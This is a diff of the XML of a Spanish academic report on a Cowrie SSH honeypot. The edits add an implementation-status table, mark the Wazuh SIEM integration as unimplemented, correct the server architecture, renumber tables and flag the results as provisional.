+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Acceso como root rechazado; reglas persistentes tras reinicio</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Cowrie como servicio y redirección del puerto 22</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1200"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Implementado y probado</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Pruebas local y externa; ataques reales registrados</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Captura de ataques reales</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1200"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">En curso</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Desde el 4 de octubre; objetivo de al menos tres semanas</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Analizador y clasificador MITRE ATT&amp;CK</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1200"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Implementado y probado</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">50 pruebas automáticas; análisis de 13 761 sesiones reales</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Resultados y conclusiones</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1200"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Provisionales</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Basados en los tres primeros días de captura</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Informe de inteligencia de amenazas</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1200"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">En elaboración</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Se completará con el periodo de captura completo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Ataque controlado desde Kali Linux</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1200"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Pendiente</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Última prueba de la tabla RFTP (CU-03)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Integración con Wazuh (SIEM)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1200"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Propuesto, no implementado</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Requisito opcional R06; trabajo futuro</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:before="60" w:line="360"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tabla 5. Estado de implementación de los componentes.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14038,7 +14826,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">los logs se descargan por SSH (puerto 2022) y se analizan con el script Python (cowrie_analyzer.py). Opcionalmente se ingestan en Wazuh (SIEM). Se genera el informe de inteligencia con mapeo MITRE ATT&amp;CK.</w:t>
+        <w:t xml:space="preserve">los logs se descargan por SSH (puerto 2022) y se analizan con el script Python (cowrie_analyzer.py). La ingesta en Wazuh (SIEM) se plantea como ampliación opcional, no implementada. Se genera el informe de inteligencia con mapeo MITRE ATT&amp;CK.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16455,7 +17243,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Lo que el atacante ve al conectarse al puerto 22 es un banner SSH estándar que identifica al servidor como un sistema Ubuntu. Tras autenticarse con credenciales aceptadas por Cowrie, accede a un prompt bash simulado con un filesystem falso que incluye directorios habituales (/etc, /home, /var) y ficheros falsos como /etc/passwd. Los comandos básicos (ls, cat, wget, uname) están emulados; los no reconocidos producen un error «command not found» verosímil.</w:t>
+        <w:t xml:space="preserve">Lo que el atacante ve al conectarse al puerto 22 es un banner SSH estándar que identifica al servidor como un OpenSSH 9.2p1 de Debian 12, con el nombre de máquina web-prod-02. Tras autenticarse con credenciales aceptadas por Cowrie, accede a un prompt bash simulado con un filesystem falso que incluye directorios habituales (/etc, /home, /var) y ficheros falsos como /etc/passwd. Los comandos básicos (ls, cat, wget, uname) están emulados; los no reconocidos producen un error «command not found» verosímil.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16475,7 +17263,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Dashboard de Wazuh (Opcional)</w:t>
+        <w:t xml:space="preserve">Dashboard de Wazuh (Propuesta, no Implementada)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16494,7 +17282,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Wazuh proporciona un dashboard web (puerto 443 de la VM local) con capacidades de búsqueda, filtrado y visualización de los eventos ingeridos. Los logs de Cowrie se muestran en la sección Discover, donde pueden filtrarse por tipo de evento, IP de origen, rango temporal y otros campos. Se pueden crear visualizaciones personalizadas (gráficas de barras, mapas, tablas) agrupando los eventos por cualquier campo del JSON original.</w:t>
+        <w:t xml:space="preserve">Este apartado describe un diseño propuesto, no una interfaz construida: en esta fase los logs no se han integrado en Wazuh. Wazuh proporciona un dashboard web (puerto 443 de la VM local) con capacidades de búsqueda, filtrado y visualización de los eventos ingeridos. Si se realiza la integración, los logs de Cowrie se mostrarían en la sección Discover, donde pueden filtrarse por tipo de evento, IP de origen, rango temporal y otros campos. Se pueden crear visualizaciones personalizadas (gráficas de barras, mapas, tablas) agrupando los eventos por cualquier campo del JSON original.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17030,7 +17818,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Plataforma SIEM (Security Information and Event Management) de código abierto, derivada de OSSEC. Se instala como componente opcional en una máquina virtual local para la ingesta y visualización de los logs de Cowrie en un dashboard interactivo. Permite configurar reglas de alerta personalizadas para detectar patrones de ataque específicos.</w:t>
+        <w:t xml:space="preserve">Plataforma SIEM (Security Information and Event Management) de código abierto, derivada de OSSEC. Está disponible en el laboratorio local de virtualización del autor, pero su integración con el honeypot (ingesta de cowrie.json y reglas de alerta) no se ha realizado en esta fase: se mantiene como componente opcional del requisito R06 y como línea de trabajo futuro. El análisis del proyecto no depende de él, ya que lo realiza el script cowrie_analyzer.py.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -21870,7 +22658,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 5. Catálogo de técnicas MITRE ATT&amp;CK del clasificador.</w:t>
+        <w:t xml:space="preserve">Tabla 6. Catálogo de técnicas MITRE ATT&amp;CK del clasificador.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -22477,7 +23265,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 6. Scripts de despliegue y comprobaciones de seguridad.</w:t>
+        <w:t xml:space="preserve">Tabla 7. Scripts de despliegue y comprobaciones de seguridad.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23631,7 +24419,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 7. Opciones de Cowrie modificadas.</w:t>
+        <w:t xml:space="preserve">Tabla 8. Opciones de Cowrie modificadas.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23650,7 +24438,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Las firmas por defecto son relevantes porque algunos bots comprueban el nombre de la máquina, la versión del kernel o el banner SSH para detectar honeypots y abandonar la sesión. La identidad elegida es la de un Debian 12 actualizado, coherente con el sistema de ficheros simulado que incluye Cowrie. Conviene destacar que la arquitectura simulada (x86_64) no coincide con la real del servidor (ARM): el atacante interactúa con el sistema falso, no con el real, y la arquitectura x86_64 maximiza la captura de malware porque es la más común en los scripts de los atacantes.</w:t>
+        <w:t xml:space="preserve">Las firmas por defecto son relevantes porque algunos bots comprueban el nombre de la máquina, la versión del kernel o el banner SSH para detectar honeypots y abandonar la sesión. La identidad elegida es la de un Debian 12 actualizado, coherente con el sistema de ficheros simulado que incluye Cowrie. La arquitectura simulada es x86_64, la misma que la del servidor real de Hetzner (CX23, x86_64, según confirma el mensaje de bienvenida de Ubuntu al conectarse). La coincidencia no es imprescindible, porque el atacante interactúa con el sistema falso y no con el real, pero evita incoherencias si un bot compara la arquitectura declarada con otras señales. Además, x86_64 es la arquitectura más común en los scripts de los atacantes, lo que favorece la captura de malware.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24543,7 +25331,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 8. Funciones del analizador.</w:t>
+        <w:t xml:space="preserve">Tabla 9. Funciones del analizador.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24618,7 +25406,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">El módulo define un catálogo de reglas (Tabla 5), cada una formada por el identificador de la técnica, su nombre oficial, la táctica a la que pertenece, una expresión regular que reconoce los indicadores en el texto del comando y una recomendación defensiva, con la referencia a la mitigación de ATT&amp;CK (M1022, M1027, M1029...) cuando el marco la define. Las decisiones de diseño más relevantes son:</w:t>
+        <w:t xml:space="preserve">El módulo define un catálogo de reglas (Tabla 6), cada una formada por el identificador de la técnica, su nombre oficial, la táctica a la que pertenece, una expresión regular que reconoce los indicadores en el texto del comando y una recomendación defensiva, con la referencia a la mitigación de ATT&amp;CK (M1022, M1027, M1029...) cuando el marco la define. Las decisiones de diseño más relevantes son:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25259,7 +26047,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 9. Tratamiento de las respuestas de la API de OCI.</w:t>
+        <w:t xml:space="preserve">Tabla 10. Tratamiento de las respuestas de la API de OCI.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26142,7 +26930,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 10. Resultados de la prueba de autenticación.</w:t>
+        <w:t xml:space="preserve">Tabla 11. Resultados de la prueba de autenticación.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26744,7 +27532,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 11. Eventos registrados por Cowrie en el ataque simulado.</w:t>
+        <w:t xml:space="preserve">Tabla 12. Eventos registrados por Cowrie en el ataque simulado.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27318,7 +28106,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 12. Casos de prueba del clasificador con riesgo de error.</w:t>
+        <w:t xml:space="preserve">Tabla 13. Casos de prueba del clasificador con riesgo de error.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27970,7 +28758,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 13. Pruebas del script de aprovisionamiento.</w:t>
+        <w:t xml:space="preserve">Tabla 14. Pruebas del script de aprovisionamiento.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28763,7 +29551,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 14. Resultado del escaneo externo con nmap.</w:t>
+        <w:t xml:space="preserve">Tabla 15. Resultado del escaneo externo con nmap.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -29275,7 +30063,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 15. Resumen de la actividad capturada (4–7 de octubre de 2026).</w:t>
+        <w:t xml:space="preserve">Tabla 16. Resumen de la actividad capturada (4–7 de octubre de 2026).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -29409,7 +30197,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Todos los indicadores apuntan a herramientas automatizadas y no a operadores humanos. En las sesiones con comandos, la mediana entre la autenticación y el primer comando es de 0,7 segundos, y la mitad de todas las sesiones dura menos de 1,4 segundos. El 85,2 % de las conexiones se identifican con el cliente SSH-2.0-Go, una biblioteca de programación y no un cliente interactivo; le siguen libssh (12,8 %) y, de forma testimonial, PuTTY (0,8 %). La Tabla 16 clasifica las sesiones según lo que llegó a hacer el atacante.</w:t>
+        <w:t xml:space="preserve">Todos los indicadores apuntan a herramientas automatizadas y no a operadores humanos. En las sesiones con comandos, la mediana entre la autenticación y el primer comando es de 0,7 segundos, y la mitad de todas las sesiones dura menos de 1,4 segundos. El 85,2 % de las conexiones se identifican con el cliente SSH-2.0-Go, una biblioteca de programación y no un cliente interactivo; le siguen libssh (12,8 %) y, de forma testimonial, PuTTY (0,8 %). La Tabla 17 clasifica las sesiones según lo que llegó a hacer el atacante.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -29791,7 +30579,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 16. Clasificación de las sesiones por comportamiento.</w:t>
+        <w:t xml:space="preserve">Tabla 17. Clasificación de las sesiones por comportamiento.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -30770,7 +31558,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 17. Campañas y comportamientos identificados.</w:t>
+        <w:t xml:space="preserve">Tabla 18. Campañas y comportamientos identificados.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -30845,7 +31633,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">El clasificador asignó la actividad a 21 técnicas de 9 tácticas. La Tabla 18 resume las más relevantes de cada táctica y la Figura 8 muestra todas ellas por número de sesiones.</w:t>
+        <w:t xml:space="preserve">El clasificador asignó la actividad a 21 técnicas de 9 tácticas. La Tabla 19 resume las más relevantes de cada táctica y la Figura 8 muestra todas ellas por número de sesiones.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -31703,7 +32491,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 18. Técnicas MITRE ATT&amp;CK más relevantes por táctica.</w:t>
+        <w:t xml:space="preserve">Tabla 19. Técnicas MITRE ATT&amp;CK más relevantes por táctica.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -32320,6 +33108,25 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Las conclusiones de este capítulo se basan en los resultados provisionales de los tres primeros días de captura y se revisarán con el periodo completo en la entrega final.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
         <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
@@ -32745,7 +33552,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">La realización de este proyecto ha supuesto un reto formativo significativo que ha ido más allá de la aplicación de conocimientos teóricos. La necesidad de desplegar infraestructura real en la nube, exponer un servicio a Internet y analizar ataques genuinos ha proporcionado una experiencia práctica que difícilmente se obtiene en un entorno académico convencional.</w:t>
+        <w:t xml:space="preserve">Esta valoración se escribe a mitad de proyecto, con el honeypot en marcha y los primeros datos analizados, y se completará en la entrega final.</w:t>
       </w:r>
     </w:p>
     <w:p>
